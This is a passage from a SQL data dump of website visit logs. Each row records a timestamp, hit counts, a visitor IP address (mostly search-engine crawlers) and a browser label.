rome'),(528281,1596328567,1,1,0,0,'66.249.64.33','chrome'),(528282,1596328731,1,1,0,0,'207.46.13.98','other'),(528283,1596328929,3,3,0,0,'66.249.70.72','chrome'),(528284,1596328966,1,1,0,0,'66.249.64.38','chrome'),(528285,1596328998,8,8,0,0,'185.11.82.228','other'),(528286,1596329067,3,3,0,0,'66.249.70.70','chrome'),(528287,1596329327,3,3,0,0,'66.249.70.69','chrome'),(528288,1596329831,1,1,0,0,'34.242.209.41','chrome'),(528289,1596329911,1,1,0,0,'178.154.200.222','other'),(528290,1596330013,2,2,0,0,'66.249.70.72','chrome'),(528291,1596330334,2,2,0,0,'66.249.70.69','chrome'),(528292,1596330351,1,1,0,0,'66.249.64.38','chrome'),(528293,1596330620,8,8,0,0,'185.11.82.228','other'),(528294,1596331009,1,1,0,0,'157.55.39.22','other'),(528295,1596331196,5,5,0,0,'66.249.70.70','chrome'),(528296,1596331311,1,1,0,0,'66.249.70.72','chrome'),(528297,1596331344,4,4,0,0,'66.249.70.69','chrome'),(528298,1596332264,8,8,0,0,'185.11.82.228','other'),(528299,1596332277,1,1,0,0,'66.249.64.36','chrome'),(528300,1596332862,1,1,0,0,'66.249.70.70','chrome'),(528301,1596332865,1,1,0,0,'66.249.70.69','chrome'),(528302,1596333818,2,2,0,0,'66.249.70.69','chrome'),(528303,1596333829,8,8,0,0,'185.11.82.228','other'),(528304,1596333953,1,1,0,0,'66.249.70.72','chrome'),(528305,1596334010,1,1,0,0,'66.249.70.70','chrome'),(528306,1596334364,1,1,0,0,'17.58.99.84','other'),(528307,1596334561,1,1,0,0,'8.29.198.26','other'),(528308,1596334602,1,1,0,0,'66.249.64.36','chrome'),(528309,1596334984,1,1,0,0,'66.249.70.69','chrome'),(528310,1596335002,1,1,0,0,'213.180.203.16','other'),(528311,1596335068,5,5,0,0,'66.249.70.70','chrome'),(528312,1596335318,1,1,0,0,'66.249.64.38','chrome'),(528313,1596335340,8,8,0,0,'185.11.82.228','other'),(528314,1596335429,1,1,0,0,'103.150.30.190','other'),(528315,1596336000,1,1,0,0,'66.249.70.72','chrome'),(528316,1596336850,8,8,0,0,'185.11.82.228','other'),(528317,1596336926,1,1,0,0,'157.55.39.233','other'),(528318,1596337098,2,2,0,0,'66.249.70.69','chrome'),(528319,1596337222,1,1,0,0,'37.120.203.74','firefox'),(528320,1596337857,1,1,0,0,'178.154.200.222','other'),(528321,1596338339,8,8,0,0,'185.11.82.228','other'),(528322,1596338633,2,2,0,0,'66.249.70.70','chrome'),(528323,1596338653,4,4,0,0,'66.249.70.69','chrome'),(528324,1596338788,2,2,0,0,'66.249.64.33','chrome'),(528325,1596338815,3,3,0,0,'66.249.70.72','chrome'),(528326,1596338909,1,1,0,0,'66.249.64.36','chrome'),(528327,1596339565,1,1,0,0,'66.249.70.70','chrome'),(528328,1596339582,1,1,0,0,'66.249.70.69','chrome'),(528329,1596339622,1,1,0,0,'66.249.64.38','chrome'),(528330,1596339880,8,8,0,0,'185.11.82.228','other'),(528331,1596339933,2,2,0,0,'66.249.70.72','chrome'),(528332,1596340344,1,1,0,0,'109.72.243.249','chrome'),(528333,1596340660,1,1,0,0,'66.249.70.70','chrome'),(528334,1596341051,2,2,0,0,'66.249.70.69','chrome'),(528335,1596341207,2,2,0,0,'66.249.70.72','chrome'),(528336,1596341381,8,8,0,0,'185.11.82.228','other'),(528337,1596342116,4,4,0,0,'66.249.70.69','chrome'),(528338,1596342139,1,1,0,0,'66.249.70.72','chrome'),(528339,1596342729,1,1,0,0,'157.55.39.84','other'),(528340,1596342823,1,1,0,0,'66.249.64.36','chrome'),(528341,1596343255,2,2,0,0,'66.249.70.69','chrome'),(528342,1596343768,8,8,0,0,'185.11.82.228','other'),(528343,1596343840,1,1,0,0,'131.220.6.152','chrome'),(528344,1596343926,1,1,0,0,'66.249.64.38','chrome'),(528345,1596343967,1,1,0,0,'66.249.64.36','chrome'),(528346,1596344203,4,4,0,0,'66.249.70.70','chrome'),(528347,1596344230,1,1,0,0,'62.205.134.182','other'),(528348,1596344851,8,8,0,0,'185.11.82.228','other'),(528349,1596344864,1,1,0,0,'207.46.13.98','other'),(528350,1596344882,1,1,0,0,'66.249.70.69','chrome'),(528351,1596345378,1,1,0,0,'8.29.198.26','other'),(528352,1596345433,1,1,0,0,'66.249.64.38','chrome'),(528353,1596345838,3,3,0,0,'66.249.70.70','chrome'),(528354,1596345929,4,4,0,0,'66.249.70.72','chrome'),(528355,1596345943,8,8,0,0,'185.11.82.228','other'),(528356,1596345953,1,1,0,0,'66.249.64.33','chrome'),(528357,1596346000,5,5,0,0,'66.249.70.69','chrome'),(528358,1596346443,1,1,0,0,'66.249.64.38','chrome'),(528359,1596346818,1,1,0,0,'66.249.64.36','chrome'),(528360,1596347014,8,8,0,0,'185.11.82.228','other'),(528361,1596347102,1,1,0,0,'66.249.70.69','chrome'),(528362,1596347796,2,2,0,0,'178.154.200.222','other'),(528363,1596348099,3,3,0,0,'66.249.70.69','chrome'),(528364,1596348154,8,8,0,0,'185.11.82.228','other'),(528365,1596348169,1,1,0,0,'66.249.64.38','chrome'),(528366,1596348301,1,1,0,0,'66.249.70.72','chrome'),(528367,1596348322,1,1,0,0,'17.58.99.84','other'),(528368,1596348338,3,3,0,0,'66.249.64.36','chrome'),(528369,1596348876,3,3,0,0,'66.249.70.70','chrome'),(528370,1596349275,8,8,0,0,'185.11.82.228','other'),(528371,1596349572,5,5,0,0,'66.249.70.69','chrome'),(528372,1596350061,1,1,0,0,'66.102.9.164','chrome'),(528373,1596350187,3,3,0,0,'66.249.70.70','chrome'),(528374,1596350412,8,8,0,0,'185.11.82.228','other'),(528375,1596351129,2,2,0,0,'66.249.70.72','chrome'),(528376,1596351275,3,3,0,0,'66.249.70.69','chrome'),(528377,1596351467,1,1,0,0,'66.249.64.36','chrome'),(528378,1596351552,8,8,0,0,'185.11.82.228','other'),(528379,1596352011,1,1,0,0,'66.249.70.70','chrome'),(528380,1596352217,2,2,0,0,'66.249.70.69','chrome'),(528381,1596352562,1,1,0,0,'66.249.70.72','chrome'),(528382,1596352716,8,8,0,0,'185.11.82.228','other'),(528383,1596353411,1,1,0,0,'45.58.116.18','chrome'),(528384,1596353515,2,2,0,0,'66.249.70.72','chrome'),(528385,1596353525,4,4,0,0,'66.249.70.70','chrome'),(528386,1596353664,4,4,0,0,'66.249.70.69','chrome'),(528387,1596353859,8,8,0,0,'185.11.82.228','other'),(528388,1596354424,1,1,0,0,'128.199.167.212','chrome'),(528389,1596354575,1,1,0,0,'184.168.27.63','chrome'),(528390,1596354749,2,2,0,0,'51.68.11.195','chrome'),(528391,1596355016,8,8,0,0,'185.11.82.228','other'),(528392,1596355091,1,1,0,0,'172.245.75.71','chrome'),(528393,1596355095,1,1,0,0,'23.95.224.82','chrome'),(528394,1596355890,3,3,0,0,'66.249.70.72','chrome'),(528395,1596355988,1,1,0,0,'66.249.64.33','chrome'),(528396,1596356063,1,1,0,0,'35.205.149.45','chrome'),(528397,1596356072,3,3,0,0,'66.249.70.70','chrome'),(528398,1596356195,8,8,0,0,'185.11.82.228','other'),(528399,1596356204,1,1,0,0,'8.29.198.25','other'),(528400,1596357368,8,8,0,0,'185.11.82.228','other'),(528401,1596357449,3,3,0,0,'212.129.4.87','chrome'),(528402,1596357615,1,1,0,0,'54.212.66.149','chrome'),(528403,1596357704,1,0,1,0,'66.249.70.69',''),(528404,1596357725,1,1,0,0,'51.75.17.170','chrome'),(528405,1596357938,1,1,0,0,'66.249.64.36','chrome'),(528406,1596358228,1,1,0,0,'66.249.70.70','chrome'),(528407,1596358252,3,3,0,0,'66.249.70.69','chrome'),(528408,1596358302,1,1,0,0,'66.249.64.33','chrome'),(528409,1596358565,8,8,0,0,'185.11.82.228','other'),(528410,1596358600,3,3,0,0,'66.249.70.72','chrome'),(528411,1596359231,4,4,0,0,'66.249.70.69','chrome'),(528412,1596359401,1,1,0,0,'112.213.89.59','chrome'),(528413,1596359477,1,1,0,0,'210.245.90.222','chrome'),(528414,1596359489,2,2,0,0,'47.89.29.162','chrome'),(528415,1596359533,1,1,0,0,'17.58.99.84','other'),(528416,1596359765,8,8,0,0,'185.11.82.228','other'),(528417,1596360049,3,3,0,0,'66.249.70.70','chrome'),(528418,1596360144,12,12,0,0,'149.3.47.200','chrome'),(528419,1596360163,1,1,0,0,'157.55.39.132','other'),(528420,1596360519,3,3,0,0,'66.249.70.72','chrome'),(528421,1596360552,3,3,0,0,'66.249.70.69','chrome'),(528422,1596360934,8,8,0,0,'185.11.82.228','other'),(528423,1596361110,1,1,0,0,'66.249.64.38','chrome'),(528424,1596361172,1,1,0,0,'5.61.250.112','chrome'),(528425,1596361607,2,2,0,0,'66.249.70.72','chrome'),(528426,1596361655,1,1,0,0,'42.112.30.118','chrome'),(528427,1596361728,2,2,0,0,'66.249.64.33','chrome'),(528428,1596361857,5,5,0,0,'66.249.70.70','chrome'),(528429,1596362102,8,8,0,0,'185.11.82.228','other'),(528430,1596362549,1,1,0,0,'66.249.70.69','chrome'),(528431,1596362597,2,2,0,0,'66.249.70.72','chrome'),(528432,1596363303,8,8,0,0,'185.11.82.228','other'),(528433,1596363560,5,5,0,0,'66.249.70.70','chrome'),(528434,1596363671,1,1,0,0,'66.249.64.38','chrome'),(528435,1596363688,1,1,0,0,'66.249.64.36','chrome'),(528436,1596363938,1,1,0,0,'157.55.39.135','other'),(528437,1596364256,3,3,0,0,'66.249.70.69','chrome'),(528438,1596364333,2,2,0,0,'66.249.70.72','chrome'),(528439,1596364574,8,8,0,0,'185.11.82.228','other'),(528440,1596364587,1,1,0,0,'66.249.64.33','chrome'),(528441,1596364632,1,1,0,0,'66.249.70.70','chrome'),(528442,1596365249,1,1,0,0,'109.74.154.72','chrome'),(528443,1596365839,8,8,0,0,'185.11.82.228','other'),(528444,1596366063,1,1,0,0,'66.249.64.36','chrome'),(528445,1596366097,2,2,0,0,'66.249.70.70','chrome'),(528446,1596366320,1,1,0,0,'66.249.70.72','chrome'),(528447,1596366958,3,3,0,0,'66.249.70.69','chrome'),(528448,1596367026,1,1,0,0,'8.29.198.27','other'),(528449,1596367094,8,8,0,0,'185.11.82.228','other'),(528450,1596367253,1,1,0,0,'66.249.64.33','chrome'),(528451,1596367276,2,2,0,0,'66.249.70.70','chrome'),(528452,1596367381,3,3,0,0,'66.249.70.72','chrome'),(528453,1596367407,2,2,0,0,'78.24.179.226','chrome'),(528454,1596367911,4,4,0,0,'66.249.70.69','chrome'),(528455,1596368290,3,3,0,0,'66.249.70.72','chrome'),(528456,1596368352,8,8,0,0,'185.11.82.228','other'),(528457,1596368746,1,1,0,0,'66.249.64.36','chrome'),(528458,1596368982,2,2,0,0,'66.249.70.69','chrome'),(528459,1596369381,1,1,0,0,'66.249.64.38','chrome'),(528460,1596369675,1,1,0,0,'66.249.70.70','chrome'),(528461,1596369694,1,1,0,0,'34.234.236.53','other'),(528462,1596369846,8,8,0,0,'185.11.82.228','other'),(528463,1596369922,1,1,0,0,'66.249.70.69','chrome'),(528464,1596370009,1,1,0,0,'31.13.127.4','other'),(528465,1596370466,2,2,0,0,'89.223.127.153','chrome'),(528466,1596370533,1,1,0,0,'112.213.89.59','chrome'),(528467,1596370756,1,1,0,0,'66.249.70.72','chrome'),(528468,1596370804,1,1,0,0,'66.249.64.36','chrome'),(528469,1596370827,3,3,0,0,'66.249.70.69','chrome'),(528470,1596371215,8,8,0,0,'185.11.82.228','other'),(528471,1596371275,4,4,0,0,'66.249.70.70','chrome'),(528472,1596371446,1,1,0,0,'157.55.39.132','other'),(528473,1596372039,2,2,0,0,'91.208.99.2','chrome'),(528474,1596372139,1,1,0,0,'162.253.224.18','chrome'),(528475,1596372398,1,1,0,0,'66.249.70.70','chrome'),(528476,1596372600,8,8,0,0,'185.11.82.228','other'),(528477,1596372743,1,1,0,0,'66.249.70.72','chrome'),(528478,1596372919,3,3,0,0,'66.249.70.69','chrome'),(528479,1596373391,1,1,0,0,'66.249.64.36','chrome'),(528480,1596374412,1,1,0,0,'66.249.64.33','chrome'),(528481,1596374723,2,2,0,0,'66.249.64.38','chrome'),(528482,1596374762,1,1,0,0,'2.47.39.212','other'),(528483,1596375007,1,1,0,0,'66.249.70.69','chrome'),(528484,1596375037,3,3,0,0,'66.249.70.70','chrome'),(528485,1596375165,2,2,0,0,'66.249.70.72','chrome'),(528486,1596375431,1,1,0,0,'34.234.236.53','other'),(528487,1596375490,1,1,0,0,'66.249.64.36','chrome'),(528488,1596375642,1,1,0,0,'17.58.99.7','other'),(528489,1596376091,1,1,0,0,'66.249.70.70','chrome'),(528490,1596376676,1,1,0,0,'66.249.70.72','chrome'),(528491,1596376856,1,1,0,0,'186.64.118.85','chrome'),(528492,1596376881,1,1,0,0,'5.189.185.171','msie'),(528493,1596377170,1,1,0,0,'84.200.223.41','chrome'),(528494,1596377853,1,1,0,0,'8.29.198.27','other'),(528495,1596378773,1,1,0,0,'157.55.39.84','other'),(528496,1596379892,2,2,0,0,'66.249.70.69','chrome'),(528497,1596380302,1,1,0,0,'52.255.202.64','chrome'),(528498,1596380308,1,1,0,0,'66.249.70.70','chrome'),(528499,1596380389,1,1,0,0,'66.249.64.38','chrome'),(528500,1596381075,1,0,1,0,'66.249.70.72',''),(528501,1596381363,1,1,0,0,'157.55.39.132','other'),(528502,1596381835,1,1,0,0,'66.249.70.72','chrome'),(528503,1596382828,1,1,0,0,'66.249.70.72','chrome'),(528504,1596383092,1,1,0,0,'66.249.70.70','chrome'),(528505,1596383403,2,2,0,0,'66.249.70.69','chrome'),(528506,1596383534,1,1,0,0,'66.249.64.33','chrome'),(528507,1596384639,1,1,0,0,'66.249.64.38','chrome'),(528508,1596384816,1,1,0,0,'178.154.200.222','other'),(528509,1596384977,1,1,0,0,'66.249.64.36','chrome'),(528510,1596385139,3,3,0,0,'66.249.70.70','chrome'),(528511,1596385143,1,1,0,0,'66.249.64.33','chrome'),(528512,1596385312,1,1,0,0,'66.249.70.72','chrome'),(528513,1596385579,1,1,0,0,'66.249.70.69','chrome'),(528514,1596385964,3,3,0,0,'3.237.190.214','other'),(528515,1596386444,3,3,0,0,'66.249.70.72','chrome'),(528516,1596386611,1,1,0,0,'213.180.203.16','other'),(528517,1596387183,1,1,0,0,'185.15.56.22','other'),(528518,1596387217,1,1,0,0,'66.249.70.69','chrome'),(528519,1596387433,1,1,0,0,'66.249.64.36','chrome'),(528520,1596388269,1,1,0,0,'66.249.70.70','chrome'),(528521,1596388656,1,1,0,0,'66.249.70.72','chrome'),(528522,1596388681,1,1,0,0,'8.29.198.25','other'),(528523,1596388944,2,2,0,0,'66.249.70.69','chrome'),(528524,1596389285,1,1,0,0,'66.249.64.36','chrome'),(528525,1596389917,1,1,0,0,'66.249.70.69','chrome'),(528526,1596390599,1,1,0,0,'66.249.64.38','chrome'),(528527,1596390824,1,1,0,0,'178.154.200.222','other'),(528528,1596391272,4,4,0,0,'66.249.70.70','chrome'),(528529,1596391785,1,1,0,0,'35.172.233.215','other'),(528530,1596391954,3,3,0,0,'66.249.70.72','chrome'),(528531,1596392410,2,2,0,0,'66.249.70.70','chrome'),(528532,1596392833,3,3,0,0,'66.249.70.69','chrome'),(528533,1596393532,1,1,0,0,'66.249.70.70','chrome'),(528534,1596394032,2,2,0,0,'66.249.70.69','chrome'),(528535,1596394066,1,1,0,0,'157.55.39.132','other'),(528536,1596394963,1,1,0,0,'66.249.70.72','chrome'),(528537,1596395019,4,4,0,0,'66.249.70.70','chrome'),(528538,1596395219,1,1,0,0,'91.196.177.218','chrome'),(528539,1596396269,2,2,0,0,'66.249.70.69','chrome'),(528540,1596396297,1,1,0,0,'91.196.177.218','chrome'),(528541,1596396606,3,3,0,0,'157.55.39.132','other'),(528542,1596397319,4,4,0,0,'66.249.70.69','chrome'),(528543,1596397546,1,1,0,0,'66.249.70.70','chrome'),(528544,1596397580,2,2,0,0,'66.249.70.72','chrome'),(528545,1596398309,1,1,0,0,'66.249.70.69','chrome'),(528546,1596398401,1,1,0,0,'66.249.64.38','chrome'),(528547,1596398688,1,1,0,0,'66.249.64.33','chrome'),(528548,1596398799,1,1,0,0,'66.249.70.70','chrome'),(528549,1596399512,1,1,0,0,'8.29.198.27','other'),(528550,1596399989,1,1,0,0,'66.249.64.33','chrome'),(528551,1596400201,1,1,0,0,'66.249.64.36','chrome'),(528552,1596400215,1,1,0,0,'66.249.70.72','chrome'),(528553,1596400282,1,1,0,0,'66.249.70.69','chrome'),(528554,1596401279,2,2,0,0,'66.249.70.72','chrome'),(528555,1596401399,1,1,0,0,'66.249.64.33','chrome'),(528556,1596401580,1,1,0,0,'66.249.70.70','chrome'),(528557,1596402003,2,2,0,0,'66.249.64.36','chrome'),(528558,1596402235,1,1,0,0,'66.249.70.69','chrome'),(528559,1596402577,1,1,0,0,'66.249.64.38','chrome'),(528560,1596402787,1,1,0,0,'17.58.99.7','other'),(528561,1596402844,3,3,0,0,'66.249.70.70','chrome'),(528562,1596403246,1,1,0,0,'66.249.70.69','chrome'),(528563,1596403610,1,1,0,0,'64.246.165.180','firefox'),(528564,1596403992,1,1,0,0,'23.254.58.46','chrome'),(528565,1596404113,3,3,0,0,'35.222.164.75','chrome'),(528566,1596404114,1,1,0,0,'35.222.164.75','other'),(528567,1596404151,1,1,0,0,'66.249.64.38','chrome'),(528568,1596404286,2,2,0,0,'66.249.70.72','chrome'),(528569,1596404763,2,2,0,0,'66.249.70.69','chrome'),(528570,1596404803,3,3,0,0,'66.249.70.70','chrome'),(528571,1596405797,3,3,0,0,'66.249.70.70','chrome'),(528572,1596406057,2,2,0,0,'17.58.99.7','other'),(528573,1596406395,4,4,0,0,'66.249.70.69','chrome'),(528574,1596406533,1,1,0,0,'66.249.64.36','chrome'),(528575,1596406577,2,2,0,0,'66.249.70.72','chrome'),(528576,1596406824,2,2,0,0,'66.249.70.70','chrome'),(528577,1596407114,2,2,0,0,'66.249.64.38','chrome'),(528578,1596407763,10,10,0,0,'189.217.50.137','chrome'),(528579,1596408496,3,3,0,0,'66.249.70.72','chrome'),(528580,1596408499,2,2,0,0,'66.249.64.33','chrome'),(528581,1596408831,2,2,0,0,'66.249.70.69','chrome'),(528582,1596408851,1,1,0,0,'66.249.64.36','chrome'),(528583,1596409087,2,2,0,0,'66.249.70.70','chrome'),(528584,1596409587,1,1,0,0,'66.249.64.38','chrome'),(528585,1596410344,1,1,0,0,'8.29.198.26','other'),(528586,1596410615,2,2,0,0,'66.249.70.70','chrome'),(528587,1596410682,2,2,0,0,'66.249.70.72','chrome'),(528588,1596411287,1,1,0,0,'66.249.64.38','chrome'),(528589,1596411304,8,8,0,0,'66.249.70.69','chrome'),(528590,1596411321,1,1,0,0,'66.249.64.36','chrome'),(528591,1596411355,1,1,0,0,'66.249.64.33','chrome'),(528592,1596411723,1,1,0,0,'66.249.70.70','chrome'),(528593,1596412361,1,1,0,0,'157.55.39.132','other'),(528594,1596412507,1,1,0,0,'62.205.134.182','other'),(528595,1596412747,1,1,0,0,'66.249.64.38','chrome'),(528596,1596413098,2,2,0,0,'66.249.70.70','chrome'),(528597,1596413278,1,1,0,0,'66.249.70.72','chrome'),(528598,1596414284,7,7,0,0,'66.249.70.72','chrome'),(528599,1596414443,2,2,0,0,'66.249.70.70','chrome'),(528600,1596414446,4,4,0,0,'66.249.70.69','chrome'),(528601,1596415647,6,6,0,0,'66.249.70.72','chrome'),(528602,1596415727,1,1,0,0,'66.249.64.33','chrome'),(528603,1596415781,2,2,0,0,'66.249.70.69','chrome'),(528604,1596415875,4,4,0,0,'66.249.70.70','chrome'),(528605,1596416368,1,1,0,0,'66.249.64.38','chrome'),(528606,1596416875,2,2,0,0,'66.249.70.70','chrome'),(528607,1596417639,4,4,0,0,'66.249.70.72','chrome'),(528608,1596417872,3,3,0,0,'66.249.70.70','chrome'),(528609,1596417956,6,6,0,0,'66.249.70.69','chrome'),(528610,1596418166,1,1,0,0,'157.55.39.84','other'),(528611,1596418551,1,1,0,0,'66.249.64.38','chrome'),(528612,1596418964,1,1,0,0,'66.249.70.72','chrome'),(528613,1596419055,2,2,0,0,'66.249.64.36','chrome'),(528614,1596419436,1,1,0,0,'66.249.70.70','chrome'),(528615,1596420162,1,1,0,0,'157.55.39.219','other'),(528616,1596420214,3,3,0,0,'66.249.70.69','chrome'),(528617,1596420582,2,2,0,0,'66.249.70.70','chrome'),(528618,1596420591,1,1,0,0,'51.77.52.160','chrome'),(528619,1596420761,3,3,0,0,'66.249.70.72','chrome'),(528620,1596421176,1,1,0,0,'8.29.198.25','other'),(528621,1596421531,3,3,0,0,'66.249.70.70','chrome'),(528622,1596421545,2,2,0,0,'66.249.70.69','chrome'),(528623,1596422281,2,2,0,0,'66.249.70.72','chrome'),(528624,1596422318,1,1,0,0,'66.249.64.38','chrome'),(528625,1596422609,2,2,0,0,'66.249.70.69','chrome'),(528626,1596423058,1,1,0,0,'66.249.64.33','chrome'),(528627,1596423143,1,1,0,0,'66.249.64.36','chrome'),(528628,1596423153,1,1,0,0,'66.249.70.70','chrome'),(528629,1596423390,1,1,0,0,'66.249.64.38','chrome'),(528630,1596423731,2,2,0,0,'66.249.70.69','chrome'),(528631,1596424106,2,2,0,0,'66.249.70.72','chrome'),(528632,1596424251,3,3,0,0,'66.249.64.33','chrome'),(528633,1596424589,4,4,0,0,'66.249.70.70','chrome'),(528634,1596424900,5,5,0,0,'66.249.70.69','chrome'),(528635,1596425072,2,2,0,0,'66.249.70.72','chrome'),(528636,1596425204,2,2,0,0,'66.249.64.36','chrome'),(528637,1596425251,1,1,0,0,'66.249.64.38','chrome'),(528638,1596426572,1,1,0,0,'157.55.39.84','other'),(528639,1596426704,1,1,0,0,'66.249.70.72','chrome'),(528640,1596426846,2,2,0,0,'66.249.70.70','chrome'),(528641,1596427147,1,1,0,0,'66.249.70.69','chrome'),(528642,1596427469,1,1,0,0,'17.58.99.7','other'),(528643,1596427664,1,1,0,0,'66.249.64.33','chrome'),(528644,1596427743,2,2,0,0,'66.249.70.72','chrome'),(528645,1596427829,2,1,1,0,'66.249.70.70',''),(528646,1596427900,1,1,0,0,'66.249.64.36','chrome'),(528647,1596428454,1,1,0,0,'66.249.64.38','chrome'),(528648,1596428712,1,1,0,0,'46.201.113.100','chrome'),(528649,1596428799,2,2,0,0,'66.249.70.69','chrome'),(528650,1596428944,2,2,0,0,'66.249.70.72','chrome'),(528651,1596429437,1,1,0,0,'157.55.39.132','other'),(528652,1596430066,2,2,0,0,'66.249.64.38','chrome'),(528653,1596430123,3,3,0,0,'66.249.70.70','chrome'),(528654,1596430225,1,1,0,0,'66.249.70.69','chrome'),(528655,1596430422,1,1,0,0,'131.220.6.152','chrome'),(528656,1596430629,1,1,0,0,'62.205.134.182','other'),(528657,1596430839,1,1,0,0,'66.249.70.72','chrome'),(528658,1596431346,1,1,0,0,'66.249.64.33','chrome'),(528659,1596432006,1,1,0,0,'8.29.198.26','other'),(528660,1596432039,2,2,0,0,'66.249.70.69','chrome'),(528661,1596432225,2,2,0,0,'66.249.70.72','chrome'),(528662,1596432583,4,4,0,0,'66.249.70.70','chrome'),(528663,1596432951,1,1,0,0,'66.249.64.36','chrome'),(528664,1596433255,1,1,0,0,'66.249.64.33','chrome'),(528665,1596433265,1,1,0,0,'66.249.70.69','chrome'),(528666,1596433591,1,1,0,0,'66.249.70.72','chrome'),(528667,1596433963,2,2,0,0,'212.26.144.116','chrome'),(528668,1596434022,1,1,0,0,'31.13.103.7','other'),(528669,1596434142,3,3,0,0,'66.249.70.70','chrome'),(528670,1596434388,1,1,0,0,'66.249.70.69','chrome'),(528671,1596434550,3,3,0,0,'66.249.70.72','chrome'),(528672,1596434607,1,1,0,0,'157.55.39.84','other'),(528673,1596435507,4,4,0,0,'66.249.70.69','chrome'),(528674,1596435770,3,3,0,0,'66.249.70.70','chrome'),(528675,1596435863,1,1,0,0,'46.164.130.94','chrome'),(528676,1596435946,2,2,0,0,'66.249.70.72','chrome'),(528677,1596436337,1,1,0,0,'91.196.178.125','chrome'),(528678,1596436934,4,4,0,0,'66.249.70.70','chrome'),(528679,1596437367,1,1,0,0,'66.249.64.33','chrome'),(528680,1596437742,1,1,0,0,'213.159.213.137','other'),(528681,1596437754,2,2,0,0,'66.249.70.72','chrome'),(528682,1596438146,6,6,0,0,'66.249.70.69','chrome'),(528683,1596438566,1,1,0,0,'91.196.178.72','chrome'),(528684,1596438697,1,1,0,0,'66.249.70.70','chrome'),(528685,1596439095,2,2,0,0,'66.249.70.69','chrome'),(528686,1596439099,3,3,0,0,'66.249.70.72','chrome'),(528687,1596439321,1,1,0,0,'157.55.39.132','other'),(528688,1596439621,1,1,0,0,'91.196.178.165','chrome'),(528689,1596439758,2,2,0,0,'66.249.70.70','chrome'),(528690,1596440928,1,1,0,0,'46.164.130.94','chrome'),(528691,1596441424,1,1,0,0,'66.249.70.70','chrome'),(528692,1596441440,2,2,0,0,'66.249.70.69','chrome'),(528693,1596441995,1,1,0,0,'66.249.64.33','chrome'),(528694,1596442379,1,1,0,0,'66.249.64.36','chrome'),(528695,1596442646,2,2,0,0,'66.249.70.69','chrome'),(528696,1596442839,1,1,0,0,'8.29.198.26','other'),(528697,1596443390,1,1,0,0,'66.249.70.70','chrome'),(528698,1596443545,1,1,0,0,'66.249.70.72','chrome'),(528699,1596443658,1,1,0,0,'66.249.70.69','chrome'),(528700,1596444488,2,2,0,0,'66.249.70.72','chrome'),(528701,1596444653,1,1,0,0,'207.46.13.158','other'),(528702,1596444667,3,3,0,0,'66.249.70.70','chrome'),(528703,1596445231,3,3,0,0,'66.249.70.69','chrome'),(528704,1596445286,1,1,0,0,'46.164.130.94','chrome'),(528705,1596445611,1,1,0,0,'92.112.124.33','chrome'),(528706,1596445616,1,1,0,0,'91.196.178.175','chrome'),(528707,1596445973,172,172,0,0,'88.198.33.145','other'),(528708,1596446249,1,1,0,0,'66.249.70.69','chrome'),(528709,1596446290,8,8,0,0,'185.11.82.228','other'),(528710,1596446311,2,2,0,0,'66.249.70.70','chrome'),(528711,1596446728,1,1,0,0,'77.111.244.5','chrome'),(528712,1596446732,1,1,0,0,'207.46.13.4','other'),(528713,1596446853,1,1,0,0,'66.249.64.38','chrome'),(528714,1596447419,8,8,0,0,'185.11.82.228','other'),(528715,1596447532,1,1,0,0,'91.196.178.73','chrome'),(528716,1596447827,1,1,0,0,'18.222.147.124','chrome'),(528717,1596448069,3,3,0,0,'66.249.70.72','chrome'),(528718,1596448240,1,1,0,0,'13.66.139.0','other'),(528719,1596448309,2,2,0,0,'66.249.70.70','chrome'),(528720,1596448516,8,8,0,0,'185.11.82.228','other'),(528721,1596449300,1,1,0,0,'66.249.64.36','chrome'),(528722,1596449476,2,2,0,0,'66.249.70.69','chrome'),(528723,1596449618,8,8,0,0,'185.11.82.228','other'),(528724,1596449640,1,1,0,0,'66.249.70.72','chrome'),(528725,1596450193,1,1,0,0,'13.66.139.0','other'),(528726,1596450226,1,1,0,0,'164.68.110.47','firefox'),(528727,1596450642,2,2,0,0,'66.249.70.72','chrome'),(528728,1596450750,8,8,0,0,'185.11.82.228','other'),(528729,1596450864,1,1,0,0,'66.249.70.70','chrome'),(528730,1596450927,1,1,0,0,'176.105.198.141','chrome'),(528731,1596451299,1,1,0,0,'66.249.70.69','chrome'),(528732,1596451567,1,1,0,0,'66.249.70.72','chrome'),(528733,1596451722,1,1,0,0,'91.196.178.175','chrome'),(528734,1596451946,8,8,0,0,'185.11.82.228','other'),(528735,1596452054,3,3,0,0,'66.249.70.70','chrome'),(528736,1596452374,2,2,0,0,'66.249.70.69','chrome'),(528737,1596452442,1,1,0,0,'66.249.64.36','chrome'),(528738,1596453148,2,2,0,0,'66.249.64.33','chrome'),(528739,1596453219,1,1,0,0,'207.46.13.4','other'),(528740,1596453433,1,1,0,0,'91.196.121.134','chrome'),(528741,1596453515,1,1,0,0,'212.26.139.186','chrome'),(528742,1596453562,2,2,0,0,'66.249.64.38','chrome'),(528743,1596453641,8,8,0,0,'185.11.82.228','other'),(528744,1596453676,1,1,0,0,'8.29.198.25','other'),(528745,1596453752,1,1,0,0,'66.249.70.72','chrome'),(528746,1596453778,1,1,0,0,'66.249.70.69','chrome'),(528747,1596454287,1,1,0,0,'66.249.64.36','chrome'),(528748,1596454481,1,1,0,0,'157.55.39.106','other'),(528749,1596454579,1,1,0,0,'109.74.154.72','chrome'),(528750,1596454791,2,2,0,0,'66.249.70.72','chrome'),(528751,1596454801,1,1,0,0,'66.249.70.70','chrome'),(528752,1596454834,1,1,0,0,'31.13.127.116','other'),(528753,1596455137,1,1,0,0,'207.46.13.158','other'),(528754,1596455310,1,1,0,0,'91.196.178.157','chrome'),(528755,1596455356,8,8,0,0,'185.11.82.228','other'),(528756,1596455366,1,1,0,0,'88.155.1.15','chrome'),(528757,1596456092,2,2,0,0,'66.249.64.38','chrome'),(528758,1596456098,1,1,0,0,'31.13.127.9','other'),(528759,1596456341,3,3,0,0,'66.249.70.70','chrome'),(528760,1596456359,2,2,0,0,'195.230.149.30','chrome'),(528761,1596456386,5,5,0,0,'66.249.70.69','chrome'),(528762,1596456389,1,1,0,0,'207.46.13.158','other'),(528763,1596456727,1,1,0,0,'46.133.121.68','chrome'),(528764,1596456869,1,1,0,0,'66.249.70.72','chrome'),(528765,1596457009,1,1,0,0,'31.13.103.16','other'),(528766,1596457129,1,1,0,0,'17.58.99.7','other'),(528767,1596457238,8,8,0,0,'185.11.82.228','other'),(528768,1596457587,1,1,0,0,'207.46.13.4','other'),(528769,1596457604,2,2,0,0,'207.46.13.158','other'),(528770,1596457997,2,2,0,0,'178.154.200.222','other'),(528771,1596458054,2,2,0,0,'66.249.70.72','chrome'),(528772,1596458432,1,1,0,0,'66.24